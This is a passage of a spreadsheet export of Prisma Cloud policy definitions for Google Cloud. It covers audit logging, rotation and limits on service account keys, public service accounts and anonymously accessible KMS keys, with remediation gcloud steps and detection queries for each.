Note: Make sure 'exemptedMembers:' is not set, as audit logging should be enabled for all the users.
3. To set audit config run:
gcloud projects set-iam-policy [PROJECT_ID] /tmp/policy.yaml 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/ensure-that-cloud-audit-logging-is-configured-properly-across-all-services-and-all-users-from-a-project
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/ensure-that-cloud-audit-logging-is-configured-properly-across-all-services-and-all-users-from-a-project</t>
        </is>
      </c>
      <c r="Y2912" t="inlineStr"/>
      <c r="Z2912" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-iam-get-audit-config' AND json.rule = 'auditConfigs[*].service does not contain allServices or (auditConfigs[*].auditLogConfigs[*].exemptedMembers exists and auditConfigs[*].auditLogConfigs[*].exemptedMembers is not empty)'
{"category":"Logging","resourceTypes":["google_project","google_project_iam_audit_config"]}</t>
        </is>
      </c>
      <c r="AA2912" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2912" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2912" t="inlineStr">
        <is>
          <t>PC-GCP-IAM-378-CKV2_GCP_5</t>
        </is>
      </c>
      <c r="AD2912" t="b">
        <v>1</v>
      </c>
      <c r="AE2912" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2912" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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2" t="inlineStr">
        <is>
          <t>237d9785-5d84-4b1d-9a46-d21f702648f0</t>
        </is>
      </c>
      <c r="AI2912" t="inlineStr">
        <is>
          <t>313db4e8-a0c8-4758-a6ce-9c12b0fc9d79</t>
        </is>
      </c>
      <c r="AJ2912" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2912" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2913">
      <c r="A2913" t="inlineStr">
        <is>
          <t>ISO 27001:2013, Microsoft Cloud Security Benchmark v1, MITRE ATT&amp;CK v10.0 [Deprecated], CIS v1.2.0 (GCP), NIST 800-53 Rev 5, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS v2.0.0 (GCP) Level 1, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST SP 800-172, New Zealand Information Security Manual (NZISM v3.4), PCI DSS v3.2.1, NIST SP 800-171 Revision 2, MITRE ATT&amp;CK v6.3 [Deprecated], HITRUST v.9.4.2 [Deprecated], Matt's ATT&amp;ACK, CDC NIST 800-53 Rev4, Rehan, Copy of ACSC Information Security Manual (ISM)-clone, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), TX-RAMP Level 1, NIST CSF, Microsoft Cloud Security Benchmark v1, ISO/IEC 27002:2013, Telecommunications Security Act - TSA, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, CIS v3.0.0 (GCP) Level 1, TX-RAMP Level 2, MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v12, CIS Controls v8.1, PCI DSS v4.0, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, CIS v1.0.0 (GCP), MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CIS Controls v7.1, ISO/IEC 27017:2015, GDPR, MITRE ATT&amp;CK v8.2 [Deprecated], ISO/IEC 27002:2013, ISO/IEC 27002:2013, MITRE ATT&amp;CK v12, ACSC Information Security Manual (ISM), TX-RAMP Level 2, Risk Management in Technology (RMiT), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v12, CIS v1.1.0 (GCP), ISO 27001:2013, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27017:2015, CSA CCM v.4.0.1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CIS Controls v8.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], CIS v1.3.0 (GCP), APRA (CPS 234) Information Security, NIST CSF, CIS Controls v8, NIST SP 800-171 Revision 3, Copy of New Zealand Information Security Manual (NZISM v3.4), Matt's ATT&amp;ACK, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.6, ITSG-33, ISO 27001:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, Copy of CIS Controls v8, CSA CCM v4.0.12, CCPA 2018, ITSG-33, PIPEDA, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Brazilian Data Protection Law (LGPD), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), Matt's ATT&amp;ACK, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.1, NIST SP 800-172, Matt's ATT&amp;ACK, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B2913" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2913" s="2" t="inlineStr"/>
      <c r="D2913" t="inlineStr"/>
      <c r="E2913" t="inlineStr"/>
      <c r="F2913" t="inlineStr"/>
      <c r="G2913" t="b">
        <v>1</v>
      </c>
      <c r="H29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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2913" t="inlineStr">
        <is>
          <t>gcloud-iam</t>
        </is>
      </c>
      <c r="K2913" t="inlineStr">
        <is>
          <t>GCP User managed service account keys are not rotated for 90 days</t>
        </is>
      </c>
      <c r="L2913" t="inlineStr">
        <is>
          <t>KEYS_AND_SECRETS</t>
        </is>
      </c>
      <c r="M2913" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2913" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2913" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2913" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2913" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R2913" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S2913" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2913" t="b">
        <v>0</v>
      </c>
      <c r="U2913" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2913" t="inlineStr">
        <is>
          <t>gcloud-iam-service-accounts-keys-list</t>
        </is>
      </c>
      <c r="W2913" t="inlineStr">
        <is>
          <t>This policy identifies user-managed service account keys which are not rotated from last 90 days or more. Rotating Service Account keys will reduce the window of opportunity for an access key that is associated with a compromised or terminated account to be used. Service Account keys should be rotated to ensure that data cannot be accessed with an old key which might have been lost, cracked, or stolen. It is recommended that all user-managed service account keys are regularly rotated.</t>
        </is>
      </c>
      <c r="X2913" t="inlineStr">
        <is>
          <t>To fix this alert, delete the old key which is older than 90 or more days, and Create a new key for that particular service account.To Delete user-managed Service Account Key older than 90 days:
1. Login to GCP Portal
2. Go to APIs &amp; Services (Left Panel)
3. Select 'Credentials' and Under section 'Service Accounts',  select the service account for which we need to delete the key
4. On the page 'Service account details' select the tab 'KEYS'
5. Click on the delete icon for the listed key after confirming the creation date is older than 90
To Create a new user-managed Service Account Key for a Service Account:
1. Login to GCP Portal
2. Go to APIs &amp; Services (Left Panel)
3. Select 'Credentials' and Under the section 'Service Accounts',  select the service account for which we need a key
4. On the page 'Service account details' select the tab 'KEYS'
5. Under 'ADD KEY' dropdown, select 'Create new key'
6. Select desired key type format among JSON or P12
7. Click on CREATE button, It will download the private key. Keep it safe.
8. Click on CLOSE if promptedIt will redirect to the APIs &amp; Services Credentials page. Make a note of the New ID displayed in the section Service account keys with the new creation date.
NOTE: Rotating the service account key might break communication for depending applications. Dependent applications need to configure manually with a new key id.</t>
        </is>
      </c>
      <c r="Y2913" t="inlineStr"/>
      <c r="Z2913" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-iam-service-accounts-keys-list' AND json.rule = 'disabled is false and name contains iam.gserviceaccount.com and (_DateTime.ageInDays($.validAfterTime) &gt; 90) and keyType equals USER_MANAGED'</t>
        </is>
      </c>
      <c r="AA2913" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2913" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2913" t="inlineStr">
        <is>
          <t>PC-GCP-IAM-207</t>
        </is>
      </c>
      <c r="AD2913" t="b">
        <v>1</v>
      </c>
      <c r="AE2913" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2913" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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3" t="inlineStr">
        <is>
          <t>b8380ba7-6797-4813-8d8c-885d92f04a1b</t>
        </is>
      </c>
      <c r="AI2913" t="inlineStr">
        <is>
          <t>bf2b33b2-af23-45cd-9cc3-6515423883b4</t>
        </is>
      </c>
      <c r="AJ2913" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2913" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2914">
      <c r="A2914" t="inlineStr">
        <is>
          <t>ISO 27001:2013, ISO 27001:2013, APRA (CPS 234) Information Security, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Demo_Daryl ACSC Information Security Manual (ISM), NIST SP 800-172, CIS v1.3.0 (GCP), Fedramp (Moderate), MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, CRI Profile v2.0, APRA (CPS 234) Information Security, NIST 800-53 Rev 5, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, CIS Controls v8.1, ISO/IEC 27002:2013, Telecommunications Security Act - TSA, MITRE ATT&amp;CK v6.3 [Deprecated], ISO 27001:2013, Rehan, HITRUST CSF v.11.2.0, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v6.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, TX-RAMP Level 2, ITSG-33, ISO/IEC 27018:2019, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), CIS v1.0.0 (GCP), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, APRA (CPS 234) Information Security, Insurance Regulatory And Development Authority Of India, CIS v3.0.0 (GCP) Level 1, SOC 2, ISO/IEC 27017:2015, NIST SP 800-171 Revision 2, TX-RAMP Level 1, MITRE ATT&amp;CK v8.2 [Deprecated], Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, DORA, Sarbanes Oxley Act (SOX), CDC NIST 800-53 Rev4, PCI DSS v3.2.1, CIS v1.1.0 (GCP), NIST CSF v2.0, MITRE ATT&amp;CK v6.3 [Deprecated], ISO 27001:2013, ISO/IEC 27002:2013, CIS v1.2.0 (GCP), ISO/IEC 27017:2015, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, SOC 2, CIS v2.0.0 (GCP) Level 1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST CSF v2.0, ITSG-33, SOC 2, HITRUST v.9.4.2 [Deprecated], NIST 800-53 Rev4, GDPR, ISO/IEC 27018:2019, SOC 2, CSA CCM v.4.0.1, ISO 27001:2013, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, Demo_Daryl ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, TX-RAMP Level 2, ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Brazilian Data Protection Law (LGPD), MITRE ATT&amp;CK v6.3 [Deprecated], NIST SP 800-172, Brazilian Data Protection Law (LGPD), PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2914" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2914" s="2" t="inlineStr"/>
      <c r="D2914" t="inlineStr"/>
      <c r="E2914" t="inlineStr"/>
      <c r="F2914" t="inlineStr"/>
      <c r="G2914" t="b">
        <v>1</v>
      </c>
      <c r="H29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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2914" t="inlineStr">
        <is>
          <t>gcloud-iam</t>
        </is>
      </c>
      <c r="K2914" t="inlineStr">
        <is>
          <t>GCP User managed service accounts have user managed service account keys</t>
        </is>
      </c>
      <c r="L2914" t="inlineStr">
        <is>
          <t>KEYS_AND_SECRETS</t>
        </is>
      </c>
      <c r="M2914" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2914" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2914" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2914" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2914" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2914" t="inlineStr">
        <is>
          <t>ISM-1648</t>
        </is>
      </c>
      <c r="S2914" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2914" t="b">
        <v>0</v>
      </c>
      <c r="U2914" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2914" t="inlineStr">
        <is>
          <t>gcloud-iam-service-accounts-keys-list</t>
        </is>
      </c>
      <c r="W2914" t="inlineStr">
        <is>
          <t>This policy identifies user managed service accounts that use user managed service account keys instead of Google-managed. For user-managed keys, the User has to take ownership of key management activities. Even after owner precaution, keys can be easily leaked by common development malpractices like checking keys into the source code or leaving them in downloads directory or accidentally leaving them on support blogs/channels. So It is recommended to limit the use of User-managed service account keys and instead use Google-managed keys which cannot be downloaded.
Note: This policy might alert the service accounts which are not created using Terraform for cloud account onboarding. These alerts are valid as no user-managed service account should be used for cloud account onboarding.</t>
        </is>
      </c>
      <c r="X2914" t="inlineStr">
        <is>
          <t>Follow the below mentioned URL to delete user managed service account keys:
https://cloud.google.com/iam/docs/creating-managing-service-account-keys#deleting</t>
        </is>
      </c>
      <c r="Y2914" t="inlineStr"/>
      <c r="Z2914" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-iam-service-accounts-keys-list' as X; config from cloud.resource where api.name = 'gcloud-iam-service-accounts-list' as Y; filter '($.X.name does not contain prisma-cloud and $.X.name contains iam.gserviceaccount.com and $.X.name contains $.Y.email and $.X.keyType contains USER_MANAGED)' ; show X;</t>
        </is>
      </c>
      <c r="AA2914" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2914" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2914" t="inlineStr">
        <is>
          <t>PC-GCP-IAM-195</t>
        </is>
      </c>
      <c r="AD2914" t="b">
        <v>1</v>
      </c>
      <c r="AE2914" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2914" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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4" t="inlineStr">
        <is>
          <t>662f4580-b4cf-430b-a72c-6550c82d38e1</t>
        </is>
      </c>
      <c r="AI2914" t="inlineStr">
        <is>
          <t>aeca7c0e-8774-420d-ba72-a77aabb2dbbb</t>
        </is>
      </c>
      <c r="AJ2914" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2914" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2915">
      <c r="A2915" t="inlineStr">
        <is>
          <t>CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, TX-RAMP Level 2, ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, ITSG-33, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, SOC 2, TX-RAMP Level 1, Secure Controls Framework (SCF) - 2024.2, ITSG-33, SOC 2, NYDFS 23 CRR-NY 500.0, SOC 2, ITSG-33, ISO/IEC 27001:2022, TX-RAMP Level 1, TX-RAMP Level 2, ISO/IEC 27001:2022, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2915" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2915" s="2" t="inlineStr"/>
      <c r="D2915" t="inlineStr"/>
      <c r="E2915" t="inlineStr"/>
      <c r="F2915" t="inlineStr"/>
      <c r="G2915" t="b">
        <v>1</v>
      </c>
      <c r="H29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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2915" t="inlineStr">
        <is>
          <t>gcloud-iam</t>
        </is>
      </c>
      <c r="K2915" t="inlineStr">
        <is>
          <t>GCP Service account is publicly accessible</t>
        </is>
      </c>
      <c r="L2915" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2915" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2915" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2915" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2915" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2915" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R2915" t="inlineStr">
        <is>
          <t>Access Enforcement</t>
        </is>
      </c>
      <c r="S2915" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2915" t="b">
        <v>0</v>
      </c>
      <c r="U2915" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2915" t="inlineStr">
        <is>
          <t>gcloud-iam-service-accounts-list</t>
        </is>
      </c>
      <c r="W2915" t="inlineStr">
        <is>
          <t>This policy identifies GCP Service accounts that are publicly accessible.
GCP Service accounts are intended to be used by an application or compute workload, rather than a person. It can be granted permission to perform actions in the GCP project as any other GCP user. Allowing access to 'allUsers' or 'allAuthenticatedUsers' over a service account would allow unwanted access to the public and could lead to a security breach.
As a security best practice, follow the Principle of Least Privilege and grant permissions to entities only on a need basis. It is recommended to avoid granting permission to 'allUsers' or 'allAuthenticatedUsers'.</t>
        </is>
      </c>
      <c r="X2915" t="inlineStr">
        <is>
          <t>To revoke access from 'allusers'/'allAuthenticatedUsers', follow the below mentioned steps:
1. Login to the GCP console
2. Navigate to the 'IAM and Admin' service (Left Panel)
3. Go to 'Service Accounts'
4. Click on the alerting service account
5. Under the 'PERMISSIONS' tab, select the 'VIEW BY PRINCIPALS' tab
6. Select the entries with 'allUsers' or 'allAuthenticatedUsers' 
7. Click on the 'REMOVE ACCESS' to revoke access from 'allusers'/'allAuthenticatedUsers'
8. Click on 'CONFIRM'</t>
        </is>
      </c>
      <c r="Y2915" t="inlineStr"/>
      <c r="Z2915" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-iam-service-accounts-list' AND json.rule = ( iamPolicy.bindings[*].members contains "allUsers" or iamPolicy.bindings[*].members contains "allAuthenticatedUsers" ) and ( disabled does not exist or disabled is false )</t>
        </is>
      </c>
      <c r="AA2915" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2915" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2915" t="inlineStr">
        <is>
          <t>PC-PC-GCP-IAM-1136</t>
        </is>
      </c>
      <c r="AD2915" t="b">
        <v>1</v>
      </c>
      <c r="AE2915" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2915" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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5" t="inlineStr">
        <is>
          <t>1980fba9-f250-460b-a6d8-f62213f771f7</t>
        </is>
      </c>
      <c r="AI2915" t="inlineStr">
        <is>
          <t>fe3570af-1bd8-4ad8-999d-bab609271304</t>
        </is>
      </c>
      <c r="AJ2915" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2915" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2916">
      <c r="A2916" t="inlineStr">
        <is>
          <t>DM_TEST_ONE</t>
        </is>
      </c>
      <c r="B2916" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2916" s="2" t="inlineStr"/>
      <c r="D2916" t="inlineStr"/>
      <c r="E2916" t="inlineStr"/>
      <c r="F2916" t="inlineStr"/>
      <c r="G2916" t="b">
        <v>0</v>
      </c>
      <c r="H29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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2916" t="inlineStr">
        <is>
          <t>gcloud-kms</t>
        </is>
      </c>
      <c r="K2916" t="inlineStr">
        <is>
          <t>DM_TEST</t>
        </is>
      </c>
      <c r="L2916" t="inlineStr"/>
      <c r="M2916" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2916" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2916" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2916" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2916" t="inlineStr">
        <is>
          <t>Identity</t>
        </is>
      </c>
      <c r="R2916" t="inlineStr">
        <is>
          <t>MFA</t>
        </is>
      </c>
      <c r="S2916" t="inlineStr"/>
      <c r="T2916" t="b">
        <v>0</v>
      </c>
      <c r="U2916" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2916" t="inlineStr">
        <is>
          <t>gcloud-kms-crypto-keys-list</t>
        </is>
      </c>
      <c r="W2916" t="inlineStr">
        <is>
          <t>DM_TEST</t>
        </is>
      </c>
      <c r="X2916" t="inlineStr"/>
      <c r="Y2916" t="inlineStr"/>
      <c r="Z2916" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-kms-crypto-keys-list' AND json.rule = ((purpose does not equal ENCRYPT_DECRYPT) or (purpose equals ENCRYPT_DECRYPT and primary.state equals ENABLED)) and iamPolicy.bindings[*].members contains allUsers or iamPolicy.bindings[*].members contains allAuthenticatedUsers</t>
        </is>
      </c>
      <c r="AA2916" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2916" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2916" t="inlineStr"/>
      <c r="AD2916" t="b">
        <v>0</v>
      </c>
      <c r="AE2916" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2916" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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6" t="inlineStr">
        <is>
          <t>10f6af9d-1b5c-4ad5-ad2d-32f824e8819c</t>
        </is>
      </c>
      <c r="AI2916" t="inlineStr">
        <is>
          <t>f26ffd7e-ff3d-42b2-b5c1-3b9a1c5a1241</t>
        </is>
      </c>
      <c r="AJ2916" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2916" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2917">
      <c r="A2917" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, CSA CCM v4.0.12, HIPAA, CIS v2.0.0 (GCP) Level 1, NYDFS 23 CRR-NY 500.0, TX-RAMP Level 2, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, DORA, CIS v3.0.0 (GCP) Level 1, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), TX-RAMP Level 1, Secure Controls Framework (SCF) - 2022.2.1, SOC 2, ISO/IEC 27001:2022, Risk Management in Technology (RMiT), ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B2917" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2917" s="2" t="inlineStr"/>
      <c r="D2917" t="inlineStr"/>
      <c r="E2917" t="inlineStr"/>
      <c r="F2917" t="inlineStr"/>
      <c r="G2917" t="b">
        <v>1</v>
      </c>
      <c r="H29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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2917" t="inlineStr">
        <is>
          <t>gcloud-kms</t>
        </is>
      </c>
      <c r="K2917" t="inlineStr">
        <is>
          <t>GCP KMS crypto key is anonymously accessible</t>
        </is>
      </c>
      <c r="L2917" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2917" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2917" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2917" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2917" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2917" t="inlineStr">
        <is>
          <t>Organisational Controls</t>
        </is>
      </c>
      <c r="R2917" t="inlineStr">
        <is>
          <t>A5.15</t>
        </is>
      </c>
      <c r="S2917" t="inlineStr"/>
      <c r="T2917" t="b">
        <v>0</v>
      </c>
      <c r="U2917" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2917" t="inlineStr">
        <is>
          <t>gcloud-kms-crypto-keys-list</t>
        </is>
      </c>
      <c r="W2917" t="inlineStr">
        <is>
          <t>This policy identifies GCP KMS crypto keys that are anonymously accessible. Granting permissions to 'allUsers' or 'allAuthenticatedUsers' allows anyone to access the KMS key. As a security best practice, it is recommended not to bind such members to KMS IAM policy.</t>
        </is>
      </c>
      <c r="X2917" t="inlineStr">
        <is>
          <t>Granting/revoking access for the KMS key is only supported by CLI. To remediate run the below CLI command. 
1. List all the cryptokeys which has overly permissive IAM bindings,
gcloud asset search-all-iam-policies --asset-types=cloudkms.googleapis.com/CryptoKey --query="policy:(allUsers OR allAuthenticatedUsers)" 
2. Remove IAM policy binding for a KMS key to remove access to allUsers and allAuthenticatedUsers using the below command.
gcloud kms keys remove-iam-policy-binding [key_name] --keyring='[key_ring_name]' --location='[location]' --member='[allUsers/allAuthenticatedUsers]' --role='[role]'
Refer to the following URL for more information on “remove-iam-policy-binding” command.
https://cloud.google.com/sdk/gcloud/reference/projects/remove-iam-policy-binding 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-that-cloud-kms-cryptokeys-are-not-anonymously-or-publicly-accessible
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-that-cloud-kms-cryptokeys-are-not-anonymously-or-publicly-accessible</t>
        </is>
      </c>
      <c r="Y2917" t="inlineStr"/>
      <c r="Z2917" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-kms-crypto-keys-list' AND json.rule = ((purpose does not equal ENCRYPT_DECRYPT) or (purpose equals ENCRYPT_DECRYPT and primary.state equals ENABLED)) and iamPolicy.bindings[*].members contains allUsers or iamPolicy.bindings[*].members contains allAuthenticatedUsers
{"category":"General","resourceTypes":["google_kms_crypto_key_iam_binding","google_kms_crypto_key","google_kms_crypto_key_iam_member"]}</t>
        </is>
      </c>
      <c r="AA2917" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2917" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2917" t="inlineStr">
        <is>
          <t>PC-GCP-KMS-933-CKV2_GCP_6</t>
        </is>
      </c>
      <c r="AD2917" t="b">
        <v>1</v>
      </c>
      <c r="AE2917" t="inlineStr">
